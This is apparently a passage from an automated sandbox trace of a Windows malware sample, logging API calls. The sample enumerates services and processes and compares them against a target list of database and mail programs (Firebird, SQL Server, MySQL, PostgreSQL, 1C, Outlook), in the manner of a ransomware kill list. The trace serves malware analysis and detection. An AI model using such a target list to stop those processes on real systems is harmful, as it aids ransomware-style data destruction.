(lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0031.550] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0031.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0031.550] lstrlenW (lpString="Spooler") returned 7 [0031.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0031.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0031.550] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0031.550] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0031.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0031.550] lstrlenW (lpString="SysMain") returned 7 [0031.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0031.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0031.550] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0031.550] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0031.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0031.550] lstrlenW (lpString="Themes") returned 6 [0031.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0031.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0031.551] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0031.551] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0031.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0031.551] lstrlenW (lpString="TrkWks") returned 6 [0031.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0031.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0031.551] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0031.551] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0031.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0031.551] lstrlenW (lpString="UxSms") returned 5 [0031.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0031.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0031.551] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0031.551] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0031.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0031.551] lstrlenW (lpString="WdiServiceHost") returned 14 [0031.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0031.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0031.551] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0031.551] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0031.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0031.551] lstrlenW (lpString="WdiSystemHost") returned 13 [0031.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0031.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0031.551] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0031.551] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0031.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0031.551] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0031.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0031.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0031.551] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0031.551] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0031.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0031.551] lstrlenW (lpString="Winmgmt") returned 7 [0031.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0031.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0031.552] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0031.552] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0031.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0031.552] lstrlenW (lpString="WPDBusEnum") returned 10 [0031.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0031.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0031.552] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0031.552] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0031.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0031.552] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6230a8 | out: hHeap=0x5d0000) returned 1 [0031.552] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x114 [0031.555] Process32FirstW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0031.555] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0031.556] lstrlenW (lpString="System") returned 6 [0031.556] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0031.556] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0031.556] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0031.556] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0031.556] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0031.556] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0031.556] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0031.556] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0031.556] lstrlenW (lpString="smss.exe") returned 8 [0031.556] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0031.556] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0031.556] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0031.557] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0031.557] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0031.557] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0031.557] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0031.557] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0031.557] lstrlenW (lpString="csrss.exe") returned 9 [0031.557] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0031.557] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0031.557] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0031.557] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0031.557] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0031.557] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0031.557] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0031.558] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0031.558] lstrlenW (lpString="wininit.exe") returned 11 [0031.558] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0031.558] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0031.558] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0031.558] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0031.558] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0031.558] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0031.558] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0031.558] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0031.559] lstrlenW (lpString="csrss.exe") returned 9 [0031.559] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0031.559] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0031.559] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0031.559] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0031.559] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0031.559] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0031.559] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0031.560] lstrlenW (lpString="winlogon.exe") returned 12 [0031.560] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0031.560] lstrlenW (lpString="services.exe") returned 12 [0031.560] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0031.561] lstrlenW (lpString="lsass.exe") returned 9 [0031.561] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0031.561] lstrlenW (lpString="lsm.exe") returned 7 [0031.562] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.562] lstrlenW (lpString="svchost.exe") returned 11 [0031.562] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.563] lstrlenW (lpString="svchost.exe") returned 11 [0031.563] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.563] lstrlenW (lpString="svchost.exe") returned 11 [0031.563] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.564] lstrlenW (lpString="svchost.exe") returned 11 [0031.564] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.564] lstrlenW (lpString="svchost.exe") returned 11 [0031.564] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0031.565] lstrlenW (lpString="audiodg.exe") returned 11 [0031.565] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.565] lstrlenW (lpString="svchost.exe") returned 11 [0031.566] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.566] lstrlenW (lpString="svchost.exe") returned 11 [0031.566] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0031.567] lstrlenW (lpString="dwm.exe") returned 7 [0031.567] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0031.567] lstrlenW (lpString="explorer.exe") returned 12 [0031.567] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0031.568] lstrlenW (lpString="spoolsv.exe") returned 11 [0031.568] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0031.568] lstrlenW (lpString="taskhost.exe") returned 12 [0031.568] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.569] lstrlenW (lpString="svchost.exe") returned 11 [0031.569] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0031.570] lstrlenW (lpString="taskeng.exe") returned 11 [0031.570] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0031.570] lstrlenW (lpString="taskhost.exe") returned 12 [0031.570] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0031.571] lstrlenW (lpString="carried trinity.exe") returned 19 [0031.571] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0031.571] lstrlenW (lpString="heaven.exe") returned 10 [0031.571] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0031.572] lstrlenW (lpString="dell.exe") returned 8 [0031.572] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0031.572] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0031.572] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0031.573] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0031.573] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0031.574] lstrlenW (lpString="til ear equal.exe") returned 17 [0031.574] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0031.575] lstrlenW (lpString="itunes-bring.exe") returned 16 [0031.575] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0031.575] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0031.575] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0031.576] lstrlenW (lpString="philadelphia.exe") returned 16 [0031.576] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0031.576] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0031.576] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0031.577] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0031.577] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0031.577] lstrlenW (lpString="fraud stuck.exe") returned 15 [0031.577] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0031.578] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0031.578] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0031.579] lstrlenW (lpString="attended.exe") returned 12 [0031.579] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0032.246] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0032.246] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0032.246] lstrlenW (lpString="pan physician.exe") returned 17 [0032.246] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0032.247] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0032.247] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0032.248] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0032.248] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0032.248] lstrlenW (lpString="over-celebrity.exe") returned 18 [0032.248] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0032.249] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0032.249] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0032.249] lstrlenW (lpString="dllhost.exe") returned 11 [0032.249] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0032.250] lstrlenW (lpString="dllhost.exe") returned 11 [0032.250] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0032.250] lstrlenW (lpString="payload.exe") returned 11 [0032.250] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0032.251] lstrlenW (lpString="cmd.exe") returned 7 [0032.251] Process32NextW (in: hSnapshot=0x114, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0032.252] CloseHandle (hObject=0x114) returned 1 [0032.252] Sleep (dwMilliseconds=0x1f4) [0033.893] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6267d0 [0033.896] EnumServicesStatusExW (in: hSCManager=0x6267d0, InfoLevel=0x0, 